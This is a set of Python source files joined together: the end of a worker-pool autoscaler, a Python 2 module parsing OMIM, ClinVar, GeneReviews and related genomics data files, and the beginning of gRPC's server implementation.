cpu_workers, mem_workers, avail_workers))
delta = min(avail_workers, self.max_per_scale)
self.scale_pool_delta(total_workers, delta)
def scale_pool_delta(self, total_workers, delta):
if delta > 0:
log.debug("Starting %s workers" % delta)
for i in range(delta):
self.add_worker()
elif delta < 0:
log.debug("Should scale down the number of workers")
if self.waiting_scale_down:
log.debug("Already waiting on %s to scale down" % (
len(self.waiting_scale_down)))
return
to_kill = min(abs(delta), self.max_procs)
# Make sure we leave the desired min procs running
if to_kill >= (total_workers - self.min_procs):
# e.g. 8 running, 6 to kill, min 2: adjustment (8-6)-2 = 0, so still kill 6 and leave 2
# e.g. 8 running, 8 to kill, min 2: adjustment (8-8)-2 = -2, so kill 6 and leave 2
to_kill += (total_workers - to_kill) - self.min_procs
if to_kill <= 0:
log.debug(
"Cannot kill any more, would leave us below min procs")
return
for wname in random.sample(self.workers.keys(), to_kill):
worker = self.workers[wname]
self.waiting_scale_down.append(worker)
self.terminate_worker(worker)
def update_workers(self):
num_running = 0
num_starting = 0
waiting_terminate = 0
for wname, worker in self.workers.items():
state = worker['state']
since_update = time.time() - worker['last_update']
if state == WorkerState.TERMINATED:
if (time.time() - worker['terminate_time']) > self.terminate_seconds:
log.warning(
"Worker %s didn't terminate, sending SIGKILL" % (
wname))
self.really_terminate_worker(worker)
else:
waiting_terminate += 1
elif state == WorkerState.RUNNING:
if since_update > self.zombie_timeout:
log.info("Worker %s zombied" % (worker['w'].name))
self.terminate_worker(worker)
self.acct.add_zombie()
else:
num_running += 1
elif state == WorkerState.STARTING:
num_starting += 1
self.acct.set_waiting_terminate(waiting_terminate)
return num_running, num_starting
def terminate_worker(self, worker):
worker['state'] = WorkerState.TERMINATED
worker['terminate_time'] = time.time()
worker['w'].terminate()
def really_terminate_worker(self, worker):
try:
os.kill(worker['w'].pid, signal.SIGKILL)
except:
pass
finally:
self.on_worker_exit(worker['w'].name)
def add_worker(self):
wname = "PySplash-%s" % self.count
w = Process(target=_worker, args=(wname, self.pool_queue, self.args))
w.name = wname
self.count += 1
worker = {}
worker['state'] = WorkerState.STARTING
worker['last_update'] = time.time()
worker['w'] = w
self.workers[w.name] = worker
self.last_scale = time.time()
w.start()
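# Hedged usage sketch (illustrative; assumes a local Redis on the default port
# and an rq queue named 'default'; start() blocks in the scaling loop):
#
#   if __name__ == '__main__':
#       pool = Pool(['default'], host='localhost', port=6379,
#                   min_procs=1, max_procs=8, retire_idle=False)
#       pool.start()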
|
parser.py
|
# encoding: utf-8
import os
import re
import StringIO
from ftplib import FTP
from lxml import etree
from Queue import Queue
from threading import Thread
import json
import urllib3
from openpyxl import load_workbook
urllib3.disable_warnings()
def test():
print "测试导入"
# 把所有解析文件的处理都写到这里
class ParseMim2gene(object):
"""
Parse one record of the mim2gene.txt file; each record is a single line.
"""
def __init__(self, chunk):
self.record = {}
self.parse_mim2gene(chunk)
def parse_mim2gene(self, chunk):
items = chunk.split("\t")
self.mimNumber = int(items[0])
self.type = items[1]
try:
self.approvedGeneSymbol = items[3]
except:
self.approvedGeneSymbol = None
class ParseRefFlat(object):
"""
Parse the entire refFlat.txt file.
"""
def __init__(self, fp, debug=False):
if not os.path.exists(fp): raise Exception("%s not exists" % fp)
self.gene = {}
self.debug = debug
self.filename = fp
self.parse_refflat()
def parse_refflat(self):
if self.debug: print "Parsing filename %s" % self.filename
with open(self.filename) as f:
for line in f:
match = re.search("(\S+)\t(\S+)\tchr(\S+)\t(\S)\t(\d+)\t(\d+)\t(\d+)\t(\d+)\t(\d+)\t(\S+)\t(\S+)", line)
#match = re.search("(\S+)\t\S+\tchr(\S+)\t(\S)\t(\d+)\t(\d+)", line)
if match:
pos = {
'geneName': match.group(1), 'name': match.group(2), 'chrom': match.group(3), 'strand': match.group(4),
'txStart': int(match.group(5)), 'txEnd': int(match.group(6)), 'cdsStart': int(match.group(7)),
'cdsEnd': int(match.group(8)), 'exonCount': int(match.group(9)),
'exonStarts': list(map(int, match.group(10).rstrip(',').split(','))),
'exonEnds': list(map(int, match.group(11).rstrip(',').split(',')))
#'name': match.group(1), 'chr': match.group(2), 'strand': match.group(3),
#'start': int(match.group(4)), 'end': int(match.group(5))
}
if re.match("^([1-9]|1[0-9]|2[0-2]|[XY])$", pos['chrom']):
if self.gene.has_key(pos['geneName']):
self.gene[pos['geneName']].append(pos)
else:
self.gene[pos['geneName']] = [pos]
if self.debug: print "Parsing filename Done"
def make_changes(self, symbol):
if self.debug: print "Make changes for %s(TO OMIM Genemaps)" % symbol
symbolist = list(map(str,range(1,23)))
symbolist.extend(['X','Y'])
symbol2chr = dict(zip(symbolist, list(range(1,25))))
try:
gene = self.gene[symbol]
except KeyError,e:
print "Not found key %s" % e
return {}
chrom = gene[0]['chrom']; strand = gene[0]['strand']
start = min(list(map(lambda x: x['txStart'], gene)))
end = max(list(map(lambda x: x['txEnd'], gene)))
changes = { # use the minimum txStart as the start and the maximum txEnd as the end so that every transcript's region is covered
"approvedGeneSymbol": symbol,
'chromosome': symbol2chr[chrom],
'chromosomeSymbol': chrom,
'chromosomeLocationStart': start,
'chromosomeLocationEnd': end,
'chromosomeLocationStrand': strand
}
return changes
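# Hedged usage sketch (the refFlat filename comes from the class docstring;
# the gene symbol is illustrative):
#
#   refflat = ParseRefFlat("refFlat.txt", debug=True)
#   changes = refflat.make_changes("BRCA1")   # returns {} if the symbol is absent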
class ParseGenemap(object):
"""
Parse one record of the genemap.txt file; each record is a single line.
"""
def __init__(self, chunk):
self.record = {}
self.parse_genemap(chunk)
def parse_genemap(self, chunk):
item = chunk.split("\t")
(chrnum, seqid) = item[0].split(".")
chr_symbols = list(range(23))
chr_symbols.extend(["X","Y"])
self.record['chromosome'] = int(chrnum)
self.record['chromosomeSymbol'] = str(chr_symbols[int(chrnum)])
self.record['sequenceID'] = int(seqid)
headers = 'month day year cytoLocation geneSymbols confidence \
title mimNumber mappingMethod comments disorders \
mouseGeneSymbol references'.split()
for i in range(len(headers)):
try:
if headers[i] == "mimNumber":
self.record[headers[i]] = int(item[i+1])
elif headers[i] == 'confidence':
self.record[headers[i]] = item[i+1].upper()
elif re.search("month|day|year",headers[i]):
continue
else:
self.record[headers[i]] = item[i+1]
except IndexError:
pass
except:
raise Exception("在解析genemap.txt时发生未知错误")
class ParseMorbidmap(object):
"""
Parse one record of the morbidmap.txt file; each record is a single line.
"""
def __init__(self, chunk):
self.record = {}
self.parse_morbidmap(chunk)
def parse_morbidmap(self, chunk):
items = chunk.split("\t")
try:
phenotype_desc = items[0]
self.record['geneSymbols'] = items[1]
self.record['mimNumber'] = int(items[2])
self.record['cytoLocation'] = items[3]
if re.match("(.*)\,\s(\d{6})\s?\((\d+)\)", phenotype_desc):
get = re.match("(.*)\,\s(\d{6})\s?\((\d+)\)", phenotype_desc)
self.record['phenotype'] = get.group(1)
self.record['phenotypeMimNumber'] = int(get.group(2))
self.record['phenotypeMappingKey'] = int(get.group(3))
elif re.match("(.*)\,\s(\d{6})", phenotype_desc):
get = re.match("(.*)\,\s(\d{6})", phenotype_desc)
self.record['phenotype'] = get.group(1)
self.record['phenotypeMimNumber'] = int(get.group(2))
elif re.match("(.*)\s?\((\d+)\)", phenotype_desc):
get = re.match("(.*)\s?\((\d+)\)", phenotype_desc)
self.record['phenotype'] = get.group(1)
self.record['phenotypeMimNumber'] = self.record['mimNumber']
self.record['phenotypeMappingKey'] = int(get.group(2))
else:
self.record['phenotype'] = phenotype_desc
self.record['phenotypeMimNumber'] = self.record['mimNumber']
except Exception, e:
print e
print "出现错误"
print chunk
class ParseEntryDownload(object):
"""
The first column of the input file lists the mimNumbers to download.
"""
def __init__(self, filepath):
self.mims = []
if not os.path.exists(filepath): raise Exception(filepath + " not exists")
self.parse_entry_downloadlist(filepath)
def parse_entry_downloadlist(self, filepath):
with open(filepath) as f:
for line in f:
items = line.rstrip().lstrip().split()
if re.match("\d{6}", items[0]):
self.mims.append(int(items[0]))
class ParseEntry(object):
"""
Parse one record of the omim.txt file; records are delimited by **RECORD**.
"""
def __init__(self, chunk):
self.record = {}
self.parse_entry(chunk)
def parse_entry(self, chunk):
for field in chunk.split("*FIELD*"):
if not field: continue
if field == "\n": continue
content = StringIO.StringIO(field)
header = content.next().rstrip().lstrip()
if header.upper().find("NO") != -1:
self.header_no(content);
elif header.upper().find("TI") != -1:
self.header_ti(content)
elif header.upper().find("TX") != -1:
self.header_tx(content)
elif header.upper().find("SA") != -1:
self.header_sa(content)
elif header.upper().find("RF") != -1:
self.header_rf(content)
elif header.upper().find("CS") != -1:
self.header_cs(content)
elif header.upper().find("CN") != -1:
self.header_cn(content)
elif header.upper().find("CD") != -1:
self.header_cd(content)
elif header.upper().find("ED") != -1:
self.header_ed(content)
elif header.upper().find("AV") != -1:
self.header_av(content)
else:
raise Exception(header + u" has no corresponding parser!!")
def header_cs(self, content):
#pass
record_cs = {}
record_cs['mimNumber'] = self.record['mimNumber']
record_cs['prefix'] = self.record['prefix']
record_cs['preferredTitle'] = self.record['title']['preferredTitle']
record_cs['oldFormatExists'] = False
text = content.read().lstrip().rstrip()
if not text: return
items = [ re.sub("\s+", " ", n.replace(":","")).lstrip().rstrip() for n in re.split("([A-z, ]+\:\n)",text)]
if not items[0]: items.pop(0)
number = len(items)/2.
if number.is_integer():
for i in range(int(number)):
key = items[2*i]
cs_content = items[2*i+1]
if re.match(\
"INHERITANCE|GROWTH|HEAD AND NECK|CARDIOVASCULAR|RESPIRATORY|CHEST|ABDOMEN|GENITOURINARY|SKELETAL|SKIN\, NAILS\, HAIR|\
MUSCLE.*SOFT.*TISSUE|NEUROLOGIC|VOICE|METABOLIC FEATURES|ENDOCRINE FEATURES|HEMATOLOGY|IMMUNOLOGY|NEOPLASIA|PRENATAL MANIFESTATIONS|\
LABORATORY ABNORMALITIES|MISCELLANEOUS|MOLECULAR BASIS",\
key):
if not cs_content: continue
key_attr = key.title().replace(" ","")
key_attr = key_attr[0].lower() + key_attr[1:]
innercontent = re.split('(\[[^;]+\]\;)', cs_content)
if not innercontent[0]: innercontent.pop(0)
if len(innercontent) % 2: # an odd count means the key has a leading description
key_desc = innercontent.pop(0)
else:
key_desc = ""
record_cs[key_attr+'Exists'] = True
if key_desc: record_cs[key_attr] = key_desc
if not len(innercontent): continue
for i in range(int(len(innercontent)/2)):
#sub_key = innercontent[2*i]
#sub_conntent = innercontent[2*i+1]
sub_attr = key_attr + re.sub("\[|\];|,","",innercontent[2*i].title()).replace(" ","")
record_cs[sub_attr+"Exists"] = True
record_cs[sub_attr] = innercontent[2*i+1].lstrip().rstrip()
else:
record_cs['oldFormatExists'] = True
try:
record_cs['oldFormat'][key] = cs_content
except:
record_cs['oldFormat'] = {key:cs_content}
self.record['clinicalSynopsis'] = record_cs
self.record['clinicalSynopsisExists'] = True
else:
#raise Exception(u"CS域的值非偶数")
print u"CS域的值非偶数,因此不导入数据库".encode('utf-8').strip()
def header_av(self, content):
self.record['allelicVariantExists'] = True
rawList = re.split("\n\.(\d{4})\n","\n" + content.read().lstrip().rstrip())
if not rawList[0]: rawList.pop(0)
number = int(len(rawList)/2)
allelicVariantList = []
for i in range(number):
allele = rawList[2*i]
text = rawList[2*i+1].lstrip().rstrip()
hashlist = {'number': int(allele)}
try:
index = text.index("\n")
name = text[0:index]
splittext = re.split("\n\n",text[index+1:])
allelenamestr = splittext.pop(0)
allelenamelist = re.split(";;", allelenamestr)
if len(allelenamelist) > 1:
hashlist['alternativeNames'] = ";;".join(allelenamelist[:-1])
hashlist['mutations'] = allelenamelist[-1]
else:
hashlist['mutations'] = allelenamelist[-1]
hashlist['text'] = "\n".join([ n.lstrip().rstrip().replace("\n"," ") for n in splittext])
except: # only one line, so this should be a moved or removed entry
name = text
if name.lower().find("removed") != -1:
status = 'removed'
elif name.lower().find("moved") != -1:
status = "moved"
else:
status = 'live'
hashlist['name'] = name
hashlist['status'] = status
#print hashlist
allelicVariantList.append(hashlist)
self.record['allelicVariantList'] = allelicVariantList
def header_ed(self, content):
self.record['editHistory'] = content.read().lstrip().rstrip()
def header_cd(self,content):
self.record['createDate'] = content.read().lstrip().rstrip()
def header_cn(self,content):
self.record['contributors'] = content.read().lstrip().rstrip()
def header_rf(self,content):
rfrecords = []
rflist = [n.replace("\n"," ") for n in re.split("\r?\n\r?\n", content.read())]
for rf in rflist:
if not rf:
continue
#get = re.match("(\d+)\.\s+([^:]+)\:\s+([^\.]+)[\.\?]+[\s']+(.*)", rf)
# the source field is no longer captured
get = re.match("(\d+)\.\s+([^:]+)\:\s+(.+)", rf)
try:
refnumber = int(get.group(1))
authors = get.group(2)
title = get.group(3)
source = ""
except:
print "$$$$ ->", rf
#get = re.match("(\d+)\.\s+([^:]+)\:\s+([^\.]+(\.[^\.]+)*)[\.\?]+[\s']+(\D.*)",rf)
continue
rfrecords.append({
'reference' : {
'referenceNumber' : refnumber,
'authors' : authors,
'title' : title,
'source' : source
}
})
#if int(get.group(1)) == 1: print rf
self.record['referenceList'] = rfrecords
def header_sa(self,content):
self.record['seeAlso'] = content.read().lstrip().rstrip().replace("\n"," ")
def header_tx(self,content):
self.record['textSectionList'] = []
all = content.read()
values = [ n.lstrip().rstrip().replace("\n", " ") for n in re.split("\n[A-Z\s]+\n", all)]
if not values[0]: values.pop(0)
keys = [ n.lstrip().rstrip().replace("\n", "") for n in re.findall("\n[A-Z\s]+\n", all)]
if not len(keys):
self.record['textSectionList'].append({
'textSectionName' : 'text',
'textSectionTitle' : 'Text',
'textSectionContent' : values[0]
})
return
for i in range(len(keys)):
textsectionname = keys[i].title().replace(" ","")
textsectionname = textsectionname[0].lower() + textsectionname[1:]
self.record['textSectionList'].append({
'textSectionName' : textsectionname,
'textSectionTitle' : keys[i].title(),
'textSectionContent' : values[i]
})
def header_ti(self,content):
th = content.next().rstrip().lstrip()
fieldcontent = {}
get = re.match("(\S?)\d+\s(.*)",th)
self.record['prefix'] = get.group(1)
self.record['title'] = { 'preferredTitle': get.group(2) }
move = re.match("MOVED TO (\d+)", get.group(2))
remove = re.match("REMOVED", get.group(2))
if remove:
self.record['status'] = "removed"
elif move:
self.record['status'] = "moved"
self.record['movedTo'] = int(move.group(1))
else:
self.record['status'] = 'live'
remind = content.read().replace("\n"," ")
if remind: self.record['title']['alternativeTitles'] = remind
def header_no(self,content):
mimnumber = content.next().rstrip().lstrip()
self.record['mimNumber'] = int(mimnumber)
print "Go throught mim", self.record['mimNumber']
class ParseClinVar(object):
"""
Parse the ClinVarFullRelease_00-latest.xml file into dicts that can be imported into a mongo database.
This is a very large file, so it is parsed incrementally to keep the run efficient.
"""
def __init__(self, filename, debug=False):
if not os.path.exists(filename): raise Exception("%s not exist!" % filename)
self.filename = filename
self.debug = debug
self._count = 0
def __enter__(self):
return self;
def __exit__(self, type, value, traceback):
return False
def __iter__(self):
try:
if self.fileiter.closed:
self.fileiter = open(self.filename)
else:
self.fileiter.close()
self.fileiter = open(self.filename)
except AttributeError,e:
self.fileiter = open(self.filename)
return self._parseclinvar()
def _parseclinvar(self):
parseflag = False
buf = ""
for line in self.fileiter:
if re.match("<ClinVarSet .*>", line):
parseflag = True
buf += line
elif re.match("</ClinVarSet>", line):
parseflag = False
buf+= line
# parse the buffered record and yield the result
xmltree = etree.fromstring(buf)
yield self._generate(xmltree)
# reset the buffer for the next record
buf = ""
elif parseflag:
buf += line
else:
pass
#print line
def _generate(self, clinvar):
"""
Given the xml tree of one record, parse it and build the dict we need.
"""
self._count += 1
if not self._count%2000: print "parse count: %s" % self._count
RCVA = clinvar.find("ReferenceClinVarAssertion")
CVAs = clinvar.findall("ClinVarAssertion")
CVA = RCVA.find("ClinVarAccession")
rcv_accession = CVA.attrib['Acc']
Measure = RCVA.find('MeasureSet').find('Measure')
Name = Measure.find('Name')
if Name is None: return {}
type_ = Measure.attrib['Type']
if not (type_ == "Deletion" or\
type_ == "Duplication" or\
type_ == "copy number gain" or\
type_ == "copy number loss"):
return {}
clinsign = RCVA.find("ClinicalSignificance").find("Description").text
if clinsign.lower().find("pathogenic") == -1: return {}
CL = Measure.find("CytogeneticLocation")
Origin = RCVA.find("ObservedIn").find("Sample").find("Origin")
TS = RCVA.find("TraitSet").find("Trait")
allele_id = Measure.attrib['ID']
date_update = CVA.attrib['DateUpdated']
origin = Origin.text
name = Name.find('ElementValue').text
if CL is not None:
cytogenetic = CL.text
else:
cytogenetic = ""
seq_locations = Measure.findall("SequenceLocation")
(assembly, chrsymbol, start, end) = ('', '', -2, -2)
if not seq_locations:
seq_locations = list(Measure.iterdescendants("SequenceLocation"))
if not len(seq_locations) and self.debug:
print "\n1. %s does not have SequenceLocation\n" % rcv_accession
for seq_loc in seq_locations:
if seq_loc.attrib['Assembly'] == 'GRCh37':
chrsymbol = seq_loc.attrib['Chr']
assembly = seq_loc.attrib['Assembly']
start = seq_locations[0].attrib.get("innerStart",seq_locations[0].attrib.get("start",-1))
end = seq_locations[0].attrib.get("innerStop",seq_locations[0].attrib.get("stop",-1))
break
pubmeds = []
for item in CVAs:
for cit in item.iterdescendants("Citation"):
idd = cit.find("ID")
if idd is not None and idd.attrib['Source'] == 'PubMed':
pubmeds.append(idd.text)
pubs = ",".join(pubmeds)
genereview = ""
if TS.find('AttributeSet') is not None and TS.find('AttributeSet').find("XRef") is not None:
if TS.find('AttributeSet').find("XRef").attrib['DB'] == 'GeneReviews':
genereview = TS.find('AttributeSet').find("XRef").attrib['ID']
if (start == -2 or end == -2) and self.debug:
print "\n2. %s start and end have not been modified" % rcv_accession
if (start == -1 or end == -1) and self.debug:
print "\n3. %s does not find start and end in node" % rcv_accession
doc_hash = {
"allele_id": allele_id, "type": type_, "name": name,
"rcv_accession": rcv_accession, "clinsign":clinsign, "origin": origin,
"assembly": assembly, "chr": chrsymbol, "start": start, 'end': end,
"cytogenetic":cytogenetic, "date_update":date_update,"pubmeds":pubs,
"gene_reviews":genereview,
}
return doc_hash
def next(self):
return self.__next__()
def __next__(self):
print "good"
class ParseGeneReview(object):
"""
Download ftp://ftp.ncbi.nih.gov/pub/GeneReviews/GRshortname_NBKid_genesymbol_dzname.txt and parse out the required content.
"""
def __init__(self, url, path, filename, debug = False, nthread = 10):
self.url = url
self.path = path
self.filename = filename
self.ftp = FTP(url)
self._data = []
self.queue = Queue()
self.thread = []
self.http = urllib3.PoolManager()
self.debug = debug
self.nthread = nthread
for i in range(self.nthread):
worker = Thread(target=self._update_location, args=(i,))
worker.setDaemon(True)
self.thread.append(worker)
if debug:
print "生成ParserGeneReview对象"
def _update_location(self, num):
while True:
if self.debug: print "Worker %s is working" % num
if self.queue.qsize() == 0:
if self.debug: print "队列为空"
break
one = self.queue.get()
url = "http://grch37.rest.ensembl.org/lookup/symbol/homo_sapiens/%s?content-type=application/json" % one['gene_symbol']
try:
if self.debug: print "下载%s" % one['gene_symbol']
tx = self.http.request('GET', url)
if tx.status == 200:
data = json.loads(tx.data.decode('utf-8'))
one['chr'] = data['seq_region_name']
one['end'] = int(data['end'])
one['start'] = int(data['start'])
elif tx.status == 400:
if self.debug: print "%s is not find in web" % (one['gene_symbol'])
else:
raise Exception("下载%s坐标失败" % one['gene_symbol'])
except Exception,e:
if self.debug: print "[Error] for get %s\n%s" % (url, e)
finally:
self.queue.task_done()
def _handle_binary(self, more_data):
self._data.append(more_data)
def download(self):
if self.debug: print "Begin downloading"
self.ftp.login()
self.ftp.cwd(self.path)
self.ftp.retrbinary("RETR " + self.filename , callback=self._handle_binary)
if self.debug:
print "Finish downloading"
print "Generate genes dict"
self.data = "".join(self._data).split("\n")
if self.data[-1] == "":
self.data.pop(-1)
genes = {}
for item in self.data:
items = item.split("|")
if items[2] == '-' or items[2] == 'Not applicable':
continue
else:
try:
try:
items[3].encode("utf8")
genes[items[2]]['accession_0'].append(items[1])
genes[items[2]]['description_0'].append(items[3])
except UnicodeDecodeError,e:
continue
except KeyError,e:
try:
items[3].encode("utf8")
genes[items[2]] = {"accession_0": [items[1]], 'description_0': [items[3]], 'gene_symbol': items[2]}
except UnicodeDecodeError,e:
continue
for key,value in genes.iteritems():
value['accession'] = ";".join(value['accession_0'])
value.pop('accession_0')
value['description'] = ";".join(value['description_0'])
value.pop("description_0")
self.genes = genes
if self.debug:
print "Finish generation"
def download_location(self):
if self.debug:
print "Begin update location info"
try:
self.genes
except:
self.download()
for one in self.genes.itervalues():
self.queue.put(one)
for worker in self.thread:
worker.start()
for worker in self.thread:
worker.join()
self.queue.join()
def __iter__(self):
try:
return self.genes.itervalues()
except Exception,e:
self.download()
self.download_location()
return self.genes.itervalues()
class ParsePubmed(object):
"""
Parse the input file into data that can be imported into the pubmed table; the file is usually provided by Liu Erhong or Li Dongshuang.
"""
def __init__(self, filename, debug=False):
if not os.path.exists(filename):
raise Exception("%s not exists!" % filename)
self.filename = filename
self.debug = debug
def generate_data(self):
wb = load_workbook(filename = self.filename)
wh = wb['Sheet1']
self.data = []
head = {
1: 'name', 2: 'gender', 6: 'location', 9: 'gainloss', 10: 'description',
11: 'pmid', 12: 'cytoband', 13: 'size', 14: 'origin_position', 15: 'critical',
16: 'hg_ver', 17: 'inheritance', 18: 'have_fulltext', 19: 'note',
20: 'extra_desc', 21: 'auditor', 22: 'comment'
}
for row in wh.iter_rows():
if row[0].value.find(u"样本信息") != -1 or row[0].value.find(u"编号") != -1:
continue
data = {};name = ""
for cell in row:
try:
head[cell.col_idx]
except KeyError,e:
cellvalue = cell.value if cell.value else 'None'
if self.debug: print "Unknown field\n\tIndex -> %s\n\tValue -> %s" % (cell.col_idx, cellvalue)
continue
if cell.col_idx == 1:
name = cell.value.encode()
elif re.search("description|cytoband|size|origin_position|critical|hg_ver|inheritance|note|extra_desc|auditor|comment",head[cell.col_idx]):
if cell.value:
data[head[cell.col_idx]] = cell.value
else:
pass
elif head[cell.col_idx] == 'gender':
if cell.value and cell.value.find(u"男") != -1:
data['gender'] = 1
elif cell.value and cell.value.find(u"女") != -1:
data['gender'] = 0
elif not cell.value:
if self.debug: print "%s lack of gender" % name
else:
raise Exception("%s name's gender is %s: can not parse" % name, cell.value)
elif head[cell.col_idx] == 'location':
if cell.value:
(data['chr'], pos) = cell.value.encode().replace("chr","").split(":")
(data['start'], data['end']) = list(map(int, pos.split("-")))
else:
if self.debug: print "%s lack of 位置" % name
data['chr'] = "";data['end'] = 0;data['start'] = 0
elif head[cell.col_idx] == 'gainloss':
if not cell.value:
if self.debug: print "%s lack of 突变类型" % name
elif cell.value.find(u"重复") != -1:
data['gainloss'] = 'gain'
elif cell.value.find(u"缺失") != -1:
data['gainloss'] = 'loss'
else:
raise Exception("%s type is %s: can not parser" % name, cell.value)
elif head[cell.col_idx] == 'pmid':
if not cell.value:
if self.debug: print "%s lack of PMID号" % name
else:
data['pmid'] = str(cell.value).split("/")
elif head[cell.col_idx] == 'have_fulltext':
if not cell.value:
if self.debug: print "%s lack of 全文判读" % name
else:
data['have_fulltext'] = True if cell.value.find(u"有") != -1 else False
else:
raise Exception("%s遗漏了一个域%s" % (name, head[cell.col_idx]))
self.data.append(data)
return self.data
class ParseCytoband(object):
def __init__(self, fp, debug=False):
if not os.path.exists(fp): raise Exception("%s not exists" % fp)
self.filename = fp
self.debug = debug
self.parser_cytoband()
def parser_cytoband(self):
if self.debug: print "Parsing filename: %s" % self.filename
self.cytobands = []
with open(self.filename) as f:
for line in f:
items = line.rstrip().split("\t")
one = {'chrom': items[0], 'start': int(items[1]), 'end': int(items[2]),
'name': items[3], 'description': items[4], 'chr': items[0].replace('chr',"")}
self.cytobands.append(one)
def myreadlines(f, newline):
buf = ""
while True:
while newline in buf:
pos = buf.index(newline)
yield buf[:pos]
buf = buf[pos + len(newline):]
chunk = f.read(4096)
if not chunk:
yield buf
break
buf += chunk
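# Hedged usage sketch: myreadlines() splits a stream on an arbitrary delimiter,
# which pairs naturally with ParseEntry above (the '*RECORD*' marker and the
# filename are assumptions based on the ParseEntry docstring):
#
#   with open("omim.txt") as f:
#       for chunk in myreadlines(f, "*RECORD*"):
#           if chunk.strip():
#               entry = ParseEntry(chunk)
#               print entry.record.get('mimNumber')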
def debugprint(text):
print "*"*60
print text;
print "#"*60
|
_server.py
|
# Copyright 2016, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Service-side implementation of gRPC Python."""
import collections
import enum
import logging
import threading
import time
import grpc
from grpc import _common
from grpc._cython import cygrpc
from grpc.framework.foundation import callable_util
_SHUTDOWN_TAG = 'shutdown'
_REQUEST_CALL_TAG = 'request_call'
_RECEIVE_CLOSE_ON_SERVER_TOKEN = 'receive_close_on_server'
_SEND_INITIAL_METADATA_TOKEN = 'send_initial_metadata'
_RECEIVE_MESSAGE_TOKEN = 'receive_message'
_SEND_MESSAGE_TOKEN = 'send_message'
_SEND_INITIAL_METADATA_AND_SEND_MESSAGE_TOKEN = (
'send_initial_metadata * send_message')
_SEND_STATUS_FROM_SERVER_TOKEN = 'send_status_from_server'
_SEND_INITIAL_METADATA_AND_SEND_STATUS_FROM_SERVER_TOKEN = (
'send_initial_metadata * send_status_from_server')
_OPEN = 'open'
_CLOSED = 'closed'
_CANCELLED = 'cancelled'
_EMPTY_FLAGS = 0
_UNEXPECTED_EXIT_SERVER_GRACE = 1.0
def _serialized_request(request_event):
return request_event.batch_operations[0].received_message.bytes()
def _application_code(code):
cygrpc_code = _common.STATUS_CODE_TO_CYGRPC_STATUS_CODE.get(code)
return cygrpc.StatusCode.unknown if cygrpc_code is None else cygrpc_code
def _completion_code(state):
if state.code is None:
return cygrpc.StatusCode.ok
else:
return _application_code(state.code)
def _abortion_code(state, code):
if state.code is None:
return code
else:
return _application_code(state.code)
def _details(state):
return b'' if state.details is None else state.details
class _HandlerCallDetails(
collections.namedtuple('_HandlerCallDetails', (
'method', 'invocation_metadata',)), grpc.HandlerCallDetails):
pass
class _RPCState(object):
def __init__(self):
self.condition = threading.Condition()
self.due = set()
self.request = None
self.client = _OPEN
self.initial_metadata_allowed = True
self.disable_next_compression = False
self.trailing_metadata = None
self.code = None
self.details = None
self.statused = False
self.rpc_errors = []
self.callbacks = []
def _raise_rpc_error(state):
rpc_error = grpc.RpcError()
state.rpc_errors.append(rpc_error)
raise rpc_error
def _possibly_finish_call(state, token):
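    # Drop `token` from the set of outstanding operations. Once the client has
    # cancelled or final status has been sent, and nothing else is outstanding,
    # hand back (state, callbacks) so the caller can invoke the callbacks.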
state.due.remove(token)
if (state.client is _CANCELLED or state.statused) and not state.due:
callbacks = state.callbacks
state.callbacks = None
return state, callbacks
else:
return None, ()
def _send_status_from_server(state, token):
def send_status_from_server(unused_send_status_from_server_event):
with state.condition:
return _possibly_finish_call(state, token)
return send_status_from_server
def _abort(state, call, code, details):
if state.client is not _CANCELLED:
effective_code = _abortion_code(state, code)
effective_details = details if state.details is None else state.details
if state.initial_metadata_allowed:
operations = (cygrpc.operation_send_initial_metadata(
_common.EMPTY_METADATA, _EMPTY_FLAGS),
cygrpc.operation_send_status_from_server(
_common.cygrpc_metadata(state.trailing_metadata),
effective_code, effective_details, _EMPTY_FLAGS),)
token = _SEND_INITIAL_METADATA_AND_SEND_STATUS_FROM_SERVER_TOKEN
else:
operations = (cygrpc.operation_send_status_from_server(
_common.cygrpc_metadata(state.trailing_metadata),
effective_code, effective_details, _EMPTY_FLAGS),)
token = _SEND_STATUS_FROM_SERVER_TOKEN
call.start_server_batch(
cygrpc.Operations(operations),
_send_status_from_server(state, token))
state.statused = True
state.due.add(token)
def _receive_close_on_server(state):
def receive_close_on_server(receive_close_on_server_event):
with state.condition:
if receive_close_on_server_event.batch_operations[
0].received_cancelled:
state.client = _CANCELLED
elif state.client is _OPEN:
state.client = _CLOSED
state.condition.notify_all()
return _possibly_finish_call(state, _RECEIVE_CLOSE_ON_SERVER_TOKEN)
return receive_close_on_server
def _receive_message(state, call, request_deserializer):
def receive_message(receive_message_event):
serialized_request = _serialized_request(receive_message_event)
if serialized_request is None:
with state.condition:
if state.client is _OPEN:
state.client = _CLOSED
state.condition.notify_all()
return _possibly_finish_call(state, _RECEIVE_MESSAGE_TOKEN)
else:
request = _common.deserialize(serialized_request,
request_deserializer)
with state.condition:
if request is None:
_abort(state, call, cygrpc.StatusCode.internal,
b'Exception deserializing request!')
else:
state.request = request
state.condition.notify_all()
return _possibly_finish_call(state, _RECEIVE_MESSAGE_TOKEN)
return receive_message
